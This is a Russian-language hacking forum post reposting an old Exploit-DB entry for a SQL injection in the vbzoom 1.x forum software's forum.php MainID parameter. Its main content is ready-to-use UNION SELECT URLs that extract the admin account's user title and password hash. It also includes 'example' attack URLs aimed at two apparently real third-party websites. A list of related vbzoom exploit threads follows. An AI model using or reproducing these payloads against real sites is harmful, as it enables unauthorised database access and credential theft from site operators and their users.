Exploit vbzoom 1.x - 'forum.php?MainID' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4140
Проверка EDB
  1. Пройдено
Автор
COLD ZERO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3142
Дата публикации
2007-07-02
Код: 
--/ Long Life Palestine  --

     HHHHHH  HHHHHH HH      HHHHHH  HHHHHH HHHHHHHH  HHHH HH    HH HHHHHH
     HH   HH HH  HH HH      HHHHH  HH         HH      HH  HHH   HH HHHHH
     HH   HH HH  HH HH      HH     HH         HH      HH  HHHH  HH HH
     HHHHHH  HHHHHH HH      HHHHH   HHHHHH    HH      HH  HH HH HH HHHHHH
     HH      HH  HH HH      HH           HH   HH      HH  HH  HHHH HH
     HH      HH  HH HH      HHHHH        HH   HH      HH  HH   HHH HHHHH
     HH      HH  HH HHHHHHH HHHHHH  HHHHHH    HH     HHHH HH    HH HHHHHH

                 HH  HH HHHHHH HHHHHH HH   HH HHHHHH HHHHHH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HHH HHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HHHHHH HHHHHH HH     HHHH    HHHHHH HHHHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HH   HH
                 HH  HH HH  HH HHHHHH HH   HH HHHHHH HH    HH
--/ Long Life Palestine  --

vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

Found By : Cold z3ro , [email protected]
Homepages : http://hackteach.org , http://h4ps.com

For user :
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

For Password : 
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

Example :
http://1yemen.com/vb//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*

http://www.vz.elagha.net//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

ÞãäÇ ÈÊÛÃÑ ÑÇÈØ ãæÞÚäÇ áÜ
http://hackteach.org

-----------
Thx For : RomancyxHacker , Mogatil , Abo0oD , Mohandko , The Wolf Ksa , Root-Shell ,          Viper Hacker , By_3mry , All Friends

# www.hackteach.org

# milw0rm.com [2007-07-02]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit VBZoom Forum 1.11 - 'show.php' MainID SQL Injection
Ответы
0
Просмотры
321
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting
Ответы
0
Просмотры
312
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting
Ответы
0
Просмотры
302
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom Forum 1.11 - 'show.php' SQL Injection
Ответы
0
Просмотры
285
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.11 - 'profile.php' Cross-Site Scripting
Ответы
0
Просмотры
316
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.11 - 'forum.php' SQL Injection
Ответы
0
Просмотры
308
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.0/1.1 - Multiple SQL Injections
Ответы
0
Просмотры
305
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.0 - Arbitrary File Upload
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.0 - SQL Injection
Ответы
0
Просмотры
306
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit VBZoom 1.0/1.11 - 'login.php?UserID' Cross-Site Scripting
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу